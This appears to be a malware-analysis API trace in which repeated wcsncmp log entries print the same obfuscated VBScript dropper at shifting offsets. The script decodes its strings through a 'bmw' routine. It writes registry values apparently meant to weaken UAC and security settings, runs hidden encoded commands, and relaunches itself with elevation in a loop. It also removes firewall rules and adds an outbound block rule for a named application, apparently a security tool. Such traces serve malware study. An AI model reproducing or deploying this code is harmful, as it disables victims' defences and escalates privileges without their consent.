bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.975] wcsncmp (_String1="ion criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.975] wcsncmp (_String1="on criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.975] wcsncmp (_String1="n criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.975] wcsncmp (_String1=" criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 